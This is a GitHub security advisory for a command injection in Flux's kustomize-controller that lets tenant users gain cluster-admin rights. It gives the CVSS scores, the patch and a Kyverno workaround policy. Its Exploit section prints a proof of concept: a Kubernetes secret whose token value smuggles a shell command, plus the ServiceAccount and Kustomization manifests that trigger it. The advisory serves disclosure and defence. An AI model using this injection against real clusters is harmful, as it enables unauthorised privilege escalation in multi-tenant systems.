GitHub Advisory DatabaseGHSA-35RF-V2JV-GFG7Privilege escalation to cluster admin on multi-tenant environments
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
70.3%
Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run kubectl commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.
Impact
Multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.
Exploit
To exploit the command injection, first we create a secret with a shell command:
kubectl create secret generic exploit-token --from-literal=token=" || kubectl api-versions"
Then we create a Service Account that refers to the above Secret:
apiVersion: v1
kind: ServiceAccount
metadata:
name: exploit
namespace: default
automountServiceAccountToken: false
secrets:
- name: exploit-token
And finally a Kustomization that runs under the above Service Account:
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
name: exploit
namespace: default
spec:
interval: 5m
path: "./deploy/"
sourceRef:
kind: GitRepository
name: app
serviceAccountName: exploit
When kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.
Patches
This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the kubectl binary has been removed from the container image.
Workarounds
To prevent the creation of Kubernetes Service Accounts with secrets in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: restrict-sa
spec:
validationFailureAction: enforce
background: false
rules:
- name: validate-sa
match:
resources:
kinds:
- ServiceAccount
namespaces:
- tenant1
- tenant2
subjects:
- kind: User
name: [email protected]
- kind: User
name: [email protected]
- kind: ServiceAccount
name: kustomize-controller
namespace: flux-system
- kind: ServiceAccount
name: helm-controller
namespace: flux-system
validate:
message: "Invalid service account"
pattern:
X(secrets): "*?"
References
Disclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF.
For more information
If you have any questions or comments about this advisory:
- Open an issue in kustomize-controller repository
Affected configurations
| Vendor | Product | Version | CPE |
|---|---|---|---|
| fluxcd | kustomize-controller | * | cpe:2.3:a:fluxcd:kustomize-controller:*:*:*:*:*:*:*:* |
Related
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
70.3%